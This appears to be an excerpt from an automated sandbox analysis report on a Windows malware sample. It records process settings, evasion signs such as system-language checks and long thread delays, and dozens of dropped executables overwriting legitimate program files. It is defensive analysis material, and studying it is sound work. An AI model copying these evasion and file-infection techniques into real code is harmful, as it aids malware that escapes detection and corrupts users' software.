            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: C:\Windows\System32\AppVClient.exeCode function: 7_2_00BA5346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 7_2_00BA5346
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 10_2_00995346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 10_2_00995346
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 11_2_00CD5346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 11_2_00CD5346
            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 13_2_00BC5346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 13_2_00BC5346
            Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 19_2_00D65346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 19_2_00D65346
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeAPI/Special instruction interceptor: Address: D141F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599828
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599718
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599598
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599469
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599344
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599235
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599110
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598985
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598860
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598735
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598610
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598485
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598360
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598235
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598110
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597985
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597860
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597735
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597610
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597485
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597360
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597233
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597125
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596905
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596797
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596685
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596564
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596438
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596328
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596216
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596110
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595985
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595860
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595735
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595610
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595485
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595270
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595116
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594648
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594469
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594241
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594107
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593978
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593849
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593719
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593610
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593485
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593360
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593235
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593110
            Source: C:\Windows\System32\msdtc.exeWindow / User API: threadDelayed 482Jump to behavior
            Source: C:\Windows\SysWOW64\perfhost.exeWindow / User API: threadDelayed 5358Jump to behavior
            Source: C:\Windows\SysWOW64\perfhost.exeWindow / User API: threadDelayed 4640Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 4303
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 5508
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.149\chrome_pwa_launcher.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.149\elevation_service.exeJump to dropped file
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeDropped PE file which has not been started: C:\Windows\System32\Spectrum.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7z.exeJump to dropped file
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeDropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exeJump to dropped file
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeDropped PE file which has not been started: C:\Windows\System32\msiexec.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.149\notification_helper.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\chrmstp.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Install\{AB28DC01-2BE1-4DAE-B39D-56281F166EE0}\117.0.5938.149_117.0.5938.132_chrome_updater.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to dropped file
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeDropped PE file which has not been started: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
